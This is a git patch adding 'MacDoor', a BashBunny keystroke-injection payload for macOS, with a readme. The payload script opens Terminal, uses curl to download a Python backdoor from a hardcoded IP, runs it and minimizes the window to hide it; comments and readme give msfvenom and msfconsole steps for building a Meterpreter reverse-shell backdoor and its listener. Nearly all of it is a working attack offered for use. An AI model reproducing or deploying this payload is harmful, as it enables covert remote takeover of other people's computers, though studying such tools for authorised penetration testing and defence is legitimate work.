From abf2de5d6e8f42130febf0a7519e6234a21da4b9 Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Wed, 30 Aug 2023 13:06:16 +0200 Subject: [PATCH 1/2] Add files via upload --- .../library/execution/MacDoor/payload.txt | 47 +++++++++++++++++++ payloads/library/execution/MacDoor/readme.md | 30 ++++++++++++ 2 files changed, 77 insertions(+) create mode 100644 payloads/library/execution/MacDoor/payload.txt create mode 100644 payloads/library/execution/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt new file mode 100644 index 000000000..4c5038fc4 --- /dev/null +++ b/payloads/library/execution/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Execution +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md new file mode 100644 index 000000000..0331dc117 --- /dev/null +++ b/payloads/library/execution/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for the BashBunny + + + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ + + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Execution + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + From 08b582eba25440fe2186a65ae738c2fc0f084f65 Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Wed, 30 Aug 2023 14:42:49 +0200 Subject: [PATCH 2/2] Update readme.md --- payloads/library/execution/MacDoor/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md index 0331dc117..5e82e9ccd 100644 --- a/payloads/library/execution/MacDoor/readme.md +++ b/payloads/library/execution/MacDoor/readme.md @@ -1,12 +1,12 @@ # MacDoor - Python Backdoor Execution for the BashBunny - +``` __ ___ ____ / |/ /____ _ _____ / __ \ ____ ____ _____ / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ / / / // /_/ // /__ / /_/ // /_/ // /_/ // / /_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ - +``` * Author: afsh4ck * Version: 1.0